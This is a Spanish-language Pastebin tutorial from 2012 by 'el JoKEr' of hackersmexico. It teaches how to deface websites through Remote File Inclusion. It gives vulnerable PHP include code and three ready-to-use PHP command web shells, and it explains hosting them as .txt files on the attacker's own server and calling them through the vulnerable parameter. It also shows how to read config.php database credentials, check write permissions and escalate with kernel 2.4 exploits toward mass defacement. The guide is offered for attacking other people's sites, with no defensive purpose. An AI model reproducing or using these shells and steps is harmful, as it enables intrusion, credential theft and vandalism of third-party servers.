YeiZeta

técnica de Defacing inclusion remote (THE JOKER HACK)

Nov 18th, 2012
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.45 KB | None | 0 0
  1. Esta técnica de Defacing consiste en la inclusión remota de un servidor a otro, mediante la vulnerabilidad RFI Remote File Inclussion, esta vulnerabilidad en común en websistes que usen usen variables de inclusion y no las controles adecuadamente.
  2. Este tipo de paginas tienen un código así:
  3.  
  4. Código:
  5. <?
  6. include"$seccion";
  7. ?>
  8.  
  9. Y tienen una sintaxis algo así: http://web_vulnerable.com/index.php?seccion=noticias
  10.  
  11. Y cuando en este tipo de paginas, no se controlan bien las variables, se puede hacer una inclusión de archivos de un servidor a otro. O sea, en este ejemplo, se le inyectaría código a la variable $seccion .
  12.  
  13. Se atacaría la Web de esta manera. Si la Web es así:
  14.  
  15. http://web_vulnerable.com/index.php?seccion=noticias
  16.  
  17. se inyectaría así:
  18.  
  19. http://web_vulnerable.com/index.php?seccion=[aqui el código]
  20.  
  21.  
  22. Se tiene en cuenta que cualquier variable puede ser atacada, ya sea $id , $modules , $name ,$page $ seccion , $pagina ,etc.
  23.  
  24.  
  25. Lo que se tiene que hacer es meter código CMD, para usarlo como una Shell. Y poder ejecutar comandos Unix, y así poder modificar directamente la pagina, o aveces todo el servidor y así poder hacer un mass deface Deface Masivo
  26.  
  27.  
  28. Ya que hayas encontrado una pagina vulnerable, necesitas crear un archivo de ejecución, que es el que ejecutara los mandos Unix,
  29.  
  30. Código:
  31. <?
  32. exec($_GET[cmd],$salida);
  33. foreach($salida as $line) { echo "$line<br>"; }
  34. ?>
  35.  
  36. exec();
  37.  
  38. Código:
  39. <?
  40. system($_GET[cmd],$salida);
  41. foreach($salida as $line) { echo "$line<br>"; }
  42. ?>
  43.  
  44. system();
  45.  
  46. Código:
  47. <?
  48. passthru($_GET[cmd],$salida);
  49. foreach($salida as $line) { echo "$line<br>"; }
  50. ?>
  51.  
  52. Es importante que guardemos esos archivos con una extensión distinta a .php, porque de lo contrario se ejecutarían en nuestro servidor. Pueden usar cualquiera, TXT , JPG , GIF , etc
  53.  
  54. Listo ahora, cualquiera de esos tres archivos los subimos a nuestro servidor,
  55.  
  56. Y la forma va a ser la siguiente.
  57.  
  58. http://web_vulnerable.com/index.php?seccion=
  59.  
  60. tuweb/remote.txt?cmd=id;
  61.  
  62. Ahora, vas a poder usar como una Shell, escalar directorios, puedes ejecutar comandos Unix.
  63.  
  64.  
  65.  
  66. Si no te funciona con un código, es necesario que pruebes con los tres, ya que el servidor puede que tenga blokeada una.
  67.  
  68.  
  69.  
  70. Nota: También puedes usar herramientas más complejas como el Defacing Tool , el Executor de Comandos , que los puedes contrar en HackersMexico Defacing
  71.  
  72. En conclusión la forma de explotar la vulnerabilidad es así
  73.  
  74. Código:
  75. http://web_vulnerable.com/index.php?seccion=
  76. tuweb/remote.txt?cmd=[aquí el comando]
  77.  
  78. Comandos:
  79.  
  80. Puedes usar cualquier comando de Unix, como si se tratara de uns Shell, puedes usar el comando Cat, para poder ver el contenido de los archivos, por ejemplo de los archivos config.php que puede tener datos sobre la base de datos:
  81.  
  82. cd/home/NOMBRE_DE_USUARIO/public_html;cat config.php
  83.  
  84. Como saber si tengo permisos de escritura.
  85.  
  86. Para saber si tienes permisos debes crear un archivo con el siguiente código:
  87.  
  88. Código:
  89. <?
  90. if(@is_writable($chdir)){
  91. echo "El Servidor Tiene Permisos de Escritura - HackersMexico.com";
  92. }else{
  93. echo "Error !!!: El servidor no tiene permisos de escritura - HackersMexico.com";
  94. }
  95. ?>
  96.  
  97. ¿ Que hago si el servidor no tiene permisos de escritura?
  98.  
  99. Si te saliera este mensaje: Error !!!: El servidor no tiene permisos de escritura - HackersMexico.com
  100.  
  101. Pues podriamos usar el W00t o cualquier otro exploit que nos permita explotar el Bug del Kernel 2.4
  102.  
  103. Fuente:hackersmexico -[el JoKEr]-
Add Comment
Please, Sign In to add comment